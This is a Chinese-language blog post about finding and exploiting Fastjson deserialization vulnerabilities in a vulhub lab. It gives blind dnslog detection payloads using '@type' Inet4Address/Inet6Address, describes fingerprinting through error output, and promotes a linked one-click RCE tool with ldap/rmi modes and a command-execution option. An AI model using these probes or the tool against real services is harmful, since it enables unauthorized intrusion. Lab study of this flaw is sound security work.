Fastjson批量检查及一键利用工具

0x01 序章

上次讲解过手动利用fastjson&＃xff0c;但讲的过于太简单了。根据大家的反应&＃xff0c;收集如下几个问题。

1、如何盲打fastjson

2、判断fastjson的指纹

3、各版本payload以及使用ldap模式监听。

下面我就一一解答&＃xff0c;我只是把我在网上查到的资料消化 后分享给大家&＃xff0c;如果有大佬觉得哪里不对&＃xff0c;还望不吝赐教。这次还带来了一键利用及检测工具&＃xff0c;链接在文末。

注&＃xff1a;本文仅用于技术讨论与研究&＃xff0c;严禁用于任何违法用途&＃xff0c;违者后果自负

0x02 环境搭建

这个不用多说了吧&＃xff0c;使用vulhub搭建。

启动fastjson:1.2.24或者fastjson:1.2.45都可以。

判断fastjson&＃xff1a;

无特殊配置情况下fastjson&＃xff0c;无正确的闭合会报错&＃xff0c;返回结果里有fastjson字样。

从上图可以看出&＃xff0c;我们使用了一个花括号&＃xff0c;fastjson处理json时会返回报错信息。

有的小伙伴就问了&＃xff0c;如果是配置了不返回报错信息怎么办&＃xff1f;那这种情况就只有利用dnslog盲打了。

这里有个小技巧就是&＃xff0c;如果你批量检查或者自己的dnslog&＃xff0c;里面有很多记录。你可以这样使用&＃39;baidu&＃39;.d1flzs.dnslog.cn&＃xff0c;在dnslog前面加个名称

盲打payload&＃xff1a;

1.2.67版本前

{"zeo":{"&＃64;type":"java.net.Inet4Address","val":"fatu5k.dnslog.cn"}}

1.2.67版本后payload

{"&＃64;type":"java.net.Inet4Address","val":"dnslog"}
{"&＃64;type":"java.net.Inet6Address","val":"dnslog"}

0x03 工具使用

下面讲解工具使用&＃xff0c;这是通过GitHub上大佬工具改造的。

支持rmi及ldap两种模式

参数介绍&＃xff1a;

  -h, --help               //查看帮助

  -u, --url                  //漏洞url

  -c, --commamd     //执行命令

  -m, --mode           //选择执行模式(可选)&＃xff0c;1&＃xff1a;ldap模式(默认)&＃xff1b;2&＃xff1a;rmi模式

演示效果&＃xff08;dnslog&＃xff09;&＃xff1a;

演示效果&＃xff08;创建文件&＃xff09;&＃xff1a;

0x04 批量检测

工具链接:

https://github.com/mrknow001/fastjson_rec_exploit